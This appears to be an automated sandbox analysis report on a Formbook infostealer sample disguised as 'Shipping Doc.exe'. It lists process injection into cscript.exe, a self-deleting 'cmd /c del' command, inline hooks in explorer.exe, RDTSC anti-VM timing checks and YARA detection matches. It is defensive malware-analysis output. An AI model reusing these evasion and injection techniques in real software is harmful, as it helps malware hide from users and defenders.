Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9540 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D99A0 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D95D0 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9840 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9650 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9A50 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D96E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D96D0 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053DAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 15_2_053D9560 NtWriteFile
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053DA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053D9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219E10 NtReadFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219E90 NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219E8B NtClose,
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03219D5B NtCreateFile,
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00417164
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041E1B3
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041DAB4
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041D360
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00402D87
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00409E40
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00402FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05461D55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05390D20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B4120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0539F900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AD5E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053A841F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_05451002
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053AB090
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053CEBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053B6E30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321DAB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03217164
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321E1B3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03202FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03209E40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03202D87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03202D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0539B150 appears 32 times
          Source: Shipping Doc.exe, 00000002.00000000.210709159.00000000004B0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
          Source: Shipping Doc.exe, 00000004.00000002.320202534.0000000000F90000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
          Source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs Shipping Doc.exe
          Source: Shipping Doc.exe, 00000004.00000002.320852896.0000000001C0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping Doc.exe
          Source: Shipping Doc.exeBinary or memory string: OriginalFilenameRemotingSurroga.exe> vs Shipping Doc.exe
          Source: Shipping Doc.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Shipping Doc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Shipping Doc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.480234994.0000000005230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.320916195.0000000001C90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.320396445.00000000014D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.319900347.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.478585925.0000000003200000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.479510604.0000000003830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/2
          Source: C:\Users\user\Desktop\Shipping Doc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipping Doc.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
          Source: Shipping Doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipping Doc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Shipping Doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Shipping Doc.exeVirustotal: Detection: 50%
          Source: Shipping Doc.exeMetadefender: Detection: 31%
          Source: Shipping Doc.exeReversingLabs: Detection: 26%
          Source: unknownProcess created: C:\Users\user\Desktop\Shipping Doc.exe 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Shipping Doc.exeProcess created: C:\Users\user\Desktop\Shipping Doc.exe C:\Users\user\Desktop\Shipping Doc.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Shipping Doc.exe'
          Source: C:\Users\user\Desktop\Shipping Doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Shipping Doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Shipping Doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Shipping Doc.exe, 00000004.00000002.320512631.0000000001960000.00000040.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdb source: Shipping Doc.exe, 00000004.00000002.321211799.0000000003630000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.292742080.000000000EBC0000.00000002.00000001.sdmp
          Source: Shipping Doc.exeStatic PE information: 0xAAC44811 [Thu Oct 14 14:37:05 2060 UTC]
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_00414A19 push ebp; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_004046A7 push edx; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\Shipping Doc.exeCode function: 4_2_004167BF push ecx; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_053ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03214A19 push ebp; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CF02 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CF0B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CF6C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_032167BF push ecx; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_03214F99 pushfd ; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_032046A7 push edx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 15_2_0321CEB5 push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.2014231354
          Source: Shipping Doc.exe, jtOONAqGyrOQ0u8Ixk/bpT4mwco1CD693b7CN.csHigh entropy of concatenated method names: '.cctor', '.ctor', '.ctor', 'oPOobRO5Vf', 'xm0o4Sf5NR', 'iEhoUBHjQn', 'ijuoVsDDg2', 'MQ3opPNGI1', 'S3PoaRe2Zm', 'nWyo9cofXu'
          Source: Shipping Doc.exe, RuGDW7WIWRL3vuqXmw/WrIPZ8OGPrQJVhLUng.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'rgxUTfEcE8', 'q8OZlL4Rke', 'x5iZK8bkZ8', 'G2oZhTFUiy', 'L68ZzSd862', 'V2KO3o6ooX', 'cAnOXHn0FW', 'wSEOMWMK2K'
          Source: Shipping Doc.exe, hasvvCPjjpwAYaryty/EfFkrBZD9T3RSksP6r.csHigh entropy of concatenated method names: 'Rj7pMjk0RG', 'yxxppukx53', '.ctor', 'uJxMm4pXjR', 'k9lMjtoI45', 'wSjM2XIjCC', 'gO5MrDyTRD', 'KrXMRRV4g5', 'uydM6uLlM6', 'YGpMTXkEhk'
          Source: Shipping Doc.exe, QSqf1GDneX5foweMTs/gdXQIRHg06sMXH3Uxd.csHigh entropy of concatenated method names: '.ctor', 'OFPUt83v9K', 'Dispose', 'mCOUJCTXYL', 'upBUseu0pH', 'HIXUhn1Ejd', 'I30U81QHfg', 'StGUGWc16P', 'X1iUOqmHqd', 'Ka0ZQEPwNI'
          Source: Shipping Doc.exe, VfaCLA2tkrd397ihoB/buZV27SgYVJ8wKY7Z0.csHigh entropy of concatenated method names: 'CMppZjWBMw', 'WSepPM9SAb', 'BJApjvbu0I', 'ReYpSqXGYT', 'hp3prsATrN', 'N3op30XIBP', 'YUZpyoUrkn', 'EV6p6ZDRrC', 'S0OpzLwnNq', 'uvNabGVwIQ'
          Source: Shipping Doc.exe, UNAPpRk5a6XMif56PN/tbtYLjiE15X0m3NrV3.csHigh entropy of concatenated method names: 'DownJlYGxJ', 'xuxnPXJrTV', 'w3mnbXLFql', 'fTqnDGgSIY', 'eINnmEc12d', 'nKXnd3ROy7', 'awc4e3Q42f', 'BhB4klsGCM', 'g6x4c5BQkZ', '.ctor'
          Source: Shipping Doc.exe, UiJUy4BuRoHLOAKf06/xXY9csuTjhbcI1BP2L.csHigh entropy of concatenated method names: '.ctor', 'Save', 'HAK5f06my', 'Load', 'HD3dcOlu8', 'L3tKrC2Wr', 'IdyxYvcVc', 'UiJGtlVLwBaQxjgBF6', 'PIkx4Wf1QZgiV6aU4i', 'Dmh9sciVAETbBXxfFa'
          Source: Shipping Doc.exe, UOdyYvecVcmermsDhZ/RyGD3cgOlu803trC2W.csHigh entropy of concatenated method names: '.ctor', 'RHvjJZq4E', 'p2nSuK03D', 'vRg006sMX', 'za8rj6Xgs', 'lcY3ZFXvZ', 'SuJyVgV3w', 'K5l6Xpqre', 'aboznP1OR', 'wKa4b4MTS2'
          Source: Shipping Doc.exe, lfBAw24wG7RaGl4BUSW/LdIBF34ft0aEOrSOpS7.csHigh entropy of concatenated method names: 'Dispose', 'ab0nKv0rYl', 'QfAnxS7FmM', 'KPJntrwakq', 'hrtnJqte2T', 'get_MinimumSize', 'set_MinimumSize', 'zaruECCxke', 'AUkuQwTOtd', 'kmkuL8FL2C'
          Source: Shipping Doc.exe, xP7XZx4KUcy0rZpMq7p/C89e434dqTXWooX6OT2.csHigh entropy of concatenated method names: 'e0riOZyeQf', 'PdXiWMlD76', '.ctor', 'get_BackColor', 'set_BackColor', 'get_BackgroundImage', 'set_BackgroundImage', 'get_BackgroundImageLayout', 'set_BackgroundImageLayout', 'get_Font'
          Source: Shipping Doc.exe, wUV9j84txMqsOMB0RNC/O8br1u4x3ZTxpBM3GKp.csHigh entropy of concatenated method names: '.ctor', 'MStqzWqX98', 'Bbn63OwGFH', 'BinijXg983', 'zWEiSMBU7I', 'GetEditControl', 'GetEditedValue', 'LoadValues', 'SetEditStyle', 'GetEditStyle'
          Source: Shipping Doc.exe, m90oD71ZT6Wr9cSLC3/BCGZxMFmXU9h9JKBRA.csHigh entropy of concatenated method names: '.ctor', 'd4MMkZMC3a', 'jwDMcNsXnd', 'Gp5MqvWKfg', 'SyIMHvh4nd', 'hUNMDI3IfP', 'mDWuCAUyBYn6ulPCLkn', 'glMALsU9egpF9gq6VvY', 'BPhg4AU0cm0xPgAcOUP', 'A1LpkmUKxjoeRJhgj5v'
          Source: Shipping Doc.exe, sKgaUY4su4YTKa6GuYl/zgNK5N4JjGAZFgAu99M.csHigh entropy of concatenated method names: '.ctor', 'UbQkbXvRlm', 'IODk4e1Qh2', 'csBkUTL3tc', 'khokVDYHrG', 'Gl8i6EIG8s', 'qyCiTn1nPR', 'FE7iz1aZDQ', 'gcBwMrofCMqEqIdiR6L', 'i3QNTaoieNlxFPGbQ4d'
          Source: Shipping Doc.exe, I156H44Dv8rnIOySGfK/hltbY94HHwR3afLhEhf.csHigh entropy of concatenated method names: '.ctor', 'aLPlf5n4CH', 'tIqlwf7H6m', 'tZJlo0KBRb', 'cpflU40tFN', 'wk5lV1CuJF', 'kyhlMnlNeC', 'xLolpUglD3', 'N0WlaMcuXO', 'XbElCFHsrk'
          Source: Shipping Doc.exe, iTAtM84qSuFr2hs51c1/llm9gs4ch4IcMcmGnvJ.csHigh entropy of concatenated method names: 'FIv9ZZdDqG', 'gQI9PDLDlN', 'q2H9mKTBvh', 'uM89jAIc2y', 'zL49SlfPPi', 'get_Multiline', 'set_Multiline', 'get_Text', 'set_Text', '.ctor'
          Source: Shipping Doc.exe, aiLmWw4VnJDnSPTNJVN/XYryxx4U6BmknteXNOa.csHigh entropy of concatenated method names: '.ctor', 'ukj9woe4c6', 'Dfu9EiQsTa', 'NuW9A6sETI', 'InitializeEditingControl', 'get_EditType', 'get_ValueType', 'get_DefaultNewRowValue', 'MmH4btFKnt5dqxSDm2G', 'hZ9OUfFVGF3Eyyj8DxB'
          Source: Shipping Doc.exe, BLop0K4E7l9d1bylJUy/zJBh6F4IacA7iyEpXZO.csHigh entropy of concatenated method names: 'L5eBi4Qigv', 'ixEBkeoTbq', 'FFgBo4KGaE', 'BSVBUenW6x', 'agMBMj6JFC', 'G76Bp97jPo', 'NEABaXP8gi', 'mb7BCbn9q3', 'oorB9rEwKt', 'zx5BYqnub6'
          Source: Shipping Doc.exe, vNeJVt4AWwbHEvjgGer/LdlLQ14Qf610ZIAPrJw.csHigh entropy of concatenated method names: '.ctor', 'QppedwFCcs', 'qd6eKe7iLK', 'GI4etXfotQ', 'wxEeJ5n5Hk', 'get_Multiline', 'set_Multiline', 'fOLB0NPOGK', 'okIBFsEdfE', 'A7HB1qoYTX'
          Source: Shipping Doc.exe, nKYoUB4oxKLGj4jvd63/aLgWyc44ofXur00lLx1.csHigh entropy of concatenated method names: 'VsAaQxSlAF', 'D09aAvsZj4', 'LmhaLRSl8M', 'okva5IYOyq', 'HKUad6KvCc', 'CAuaKRAFBD', 'J6paxwfEfU', 'iLlatruy0f', 'YF3aJVd6Ly', 'dX9aspur2U'

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE3
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Shipping Doc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Shipping Doc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Shipping Doc.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000032098E4 second address: 00000000032098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 0000000003209B5E second address: 0000000003209B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
